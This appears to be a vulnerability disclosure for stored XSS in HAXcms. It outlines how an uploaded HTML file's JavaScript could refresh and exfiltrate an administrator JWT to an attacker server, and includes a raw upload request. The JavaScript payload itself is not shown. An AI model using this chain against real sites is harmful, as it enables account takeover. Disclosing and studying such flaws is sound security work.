Summary

Stored XSS Leading to Account Takeover

Details

The Exploit Chain:
1.Upload: The attacker uploads an .html file containing a JavaScript payload.
2.Execution: A logged-in administrator is tricked into visiting the URL of this uploaded file.
3.Token Refresh: The JavaScript payload makes a fetch request to the /system/api/refreshAccessToken endpoint. Because the administrator is logged in, their browser automatically attaches the haxcms_refresh_token cookie to this request.
4.JWT Theft: The server validates the refresh token and responds with a new, valid JWT access token in the JSON response.
5.Exfiltration: The JavaScript captures this new JWT from the response and sends it to an attacker-controlled server.
6.Account Takeover: The attacker now possesses a valid administrator JWT and can take full control of the application.

Vulnerability recurrence:

Then we test access to this html

You can obtain other people's identity information

PoC

POST /system/api/saveFile?siteName=yu&site_token=neWmRyvNbCCwiQ7MP2ojAjVMk-HtjlKYNOqsQjLt3RQ&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IlVqUzd6NFRFano1Q2xUMERiNnU0RmFROWJZSXgyMjd5OHN2NzRWb1hLbFkiLCJpYXQiOjE3NTUyNDYxODYsImV4cCI6MTc1NTI0NzA4NiwidXNlciI6ImFkbWluIn0.XrXr427aKbyw97aDjD2OX128DznGtw_CHMALAeodb0M HTTP/1.1
Host: 192.168.1.72:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Connection: close
Content-Length: 1128

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="bulk-import"

true
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file-upload"; filename="files/pwn1116.html"
Content-Type: text/plain

Processing your request...

------WebKitFormBoundary7MA4YWxkTrZu0gW--

Impact

The attacker now possesses a valid administrator JWT and can take full control of the application.